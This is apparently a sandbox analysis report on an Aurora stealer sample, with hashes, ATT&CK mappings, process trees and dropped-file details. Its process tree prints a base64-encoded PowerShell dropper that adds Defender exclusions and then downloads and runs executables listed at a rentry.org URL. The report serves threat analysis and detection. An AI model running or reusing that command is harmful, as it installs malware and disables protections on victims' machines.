aurora | 34e038a53f367feda9eb1ffbf71ca6af8ac9ace7a34d86c43e1f197c8988057f

Resubmissions

22/01/2025, 13:47

250122-q32g8sypgs 10

22/01/2025, 13:44

250122-q192layngz 10

22/01/2025, 13:13

250122-qf259axpht 10

17/01/2025, 17:31

250117-v3wn7sylcm 10

Analysis

max time kernel
127s
max time network
157s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22/01/2025, 13:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aurora.exe
Size

25.5MB
MD5

ee0a49caa656fe8693ffec78e69e864d
SHA1

dca409540b8c19a31e0748a17425835358a90e1b
SHA256

34e038a53f367feda9eb1ffbf71ca6af8ac9ace7a34d86c43e1f197c8988057f
SHA512

897be9ce27bec144b34cdfc4ef94cd95c2cb58a50e4679f9c3a2fa2df42c0a9dea80b4fcb7fb4fd037278cab427abaaae553e1939bff83868e15fffd3fdf3aa1
SSDEEP

98304:SlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxz:OQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRO

Score

10^/10

aurora defense_evasion discovery stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/xau9i/raw

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Aurora family
aurora

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2756	powershell.exe
6	2756	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2748	LX.exe

Loads dropped DLL 1 IoCs

pid	Process
2976	Aurora.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Aurora.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
2060	powershell.exe
864	chrome.exe
864	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe
Token: SeShutdownPrivilege	864	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe
864	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2748	2976	Aurora.exe	30
PID 2976 wrote to memory of 2748	2976	Aurora.exe	30
PID 2976 wrote to memory of 2748	2976	Aurora.exe	30
PID 2976 wrote to memory of 2748	2976	Aurora.exe	30
PID 2748 wrote to memory of 2756	2748	LX.exe	31
PID 2748 wrote to memory of 2756	2748	LX.exe	31
PID 2748 wrote to memory of 2756	2748	LX.exe	31
PID 2756 wrote to memory of 2060	2756	powershell.exe	33
PID 2756 wrote to memory of 2060	2756	powershell.exe	33
PID 2756 wrote to memory of 2060	2756	powershell.exe	33
PID 864 wrote to memory of 1496	864	chrome.exe	37
PID 864 wrote to memory of 1496	864	chrome.exe	37
PID 864 wrote to memory of 1496	864	chrome.exe	37
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2284	864	chrome.exe	39
PID 864 wrote to memory of 2792	864	chrome.exe	40
PID 864 wrote to memory of 2792	864	chrome.exe	40
PID 864 wrote to memory of 2792	864	chrome.exe	40
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41
PID 864 wrote to memory of 3000	864	chrome.exe	41

C:\Users\Admin\AppData\Local\Temp\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Users\Admin\AppData\Local\Temp\LX.exe
  "C:\Users\Admin\AppData\Local\Temp\LX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ef9758,0x7fef6ef9768,0x7fef6ef9778
  2⤵
  PID:1496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1192 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:2
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1528 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:2792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2272 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:2
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2352 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:2864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:2716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3672 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3776 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3716 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3424 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3376 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1308 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3812 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:2524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4036 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3692 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:1
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=992,i,5357442301152920113,7296313170542193960,131072 /prefetch:8
  2⤵
  PID:1956

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

Filesize
230B

MD5
f399589c13d635a60e1b07de8611445a

SHA1
0ee0dd16c43835777ffad0f51aa6ba77a0c8f2ea

SHA256
8ae06ecabccdcb2f18dcdb4a931f122554fa76450c8a0db346accf38762d79ed

SHA512
ad77c2bebc17474fba31a233a41d72fe6b70f3536375b47bc416dd57ce1b6e50329a687fbdd5d8cc41870a518128e6c9992657d65669c9c98f5748abff816920

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ed81a707dcb36486fe935d307c2e0511

SHA1
5c4c604f60f5b3d38162382b1a41c91ac633ffd2

SHA256
64c4c8ae158c7d496ac821ec30e14f11170fab9f27f709315d62a2fefeb90bed

SHA512
5aeec4b5da749e1d7c952ebae3d7b17445d5a426ffe3d94bc8f703b3e93fdb8b6cb3adb528805c2662283a52d56d99aa9555d97dfa71369b1414e404c6b1b973

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0f81654bb2dd51b00e8090e6ece2cb04

SHA1
b0fe6877657d2d949fcad3669b1a10643a71387b

SHA256
d00227d164a95ec6555de99ffb1e9d6f47b97825486ef79fab4369a959d6c2f3

SHA512
588519974370d6afbee6a13491980f2d510a388784a8c96286ee352daad98379223cdbaebe7132dd0023023d9b3ad5aa62f9fa2942b9878283dac6fde0cc7f77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1802afec45b73af7592d52932912e1f7

SHA1
48348c2a0a66a5a4e93aa715454a3051d502c02e

SHA256
18af9cc6b516717c68a4e353aa6149688ab0935d7db998e1dfda2049135205b0

SHA512
25c8775ecfbd2f485f579315edc7e0030fb692e716dc79ede395a5e085656a823eda95f7f20cfbc10ab784dfcbc9f4cf0f2076bcb6bd9e75670678eeeddf0524

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f7576419a7547ebc3b6ef8bb97601050

SHA1
80e950d0ebdcff006220a233263cd61e3f343615

SHA256
02ef3d7b2789298d82a1da11fec6c4a8fac802ccb324f6d684248c24678a1c8b

SHA512
d8a2db8eb153714d9828db83e1afccd4b852b795b40a59856bd96a2fcc5d34c974ab320030215f5d101762d8679e196e8d20ebb285db47f6dc57b202a649f21b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0eb634e566cdebc8919165fdf9b4fa7c

SHA1
96a76ea0481f908bb17c5ee0cc4ca3f2de26d8b2

SHA256
c639cfaa49cca885bba74cd0da78a16ebb98fc1116dc3337dc4577c01f6866e5

SHA512
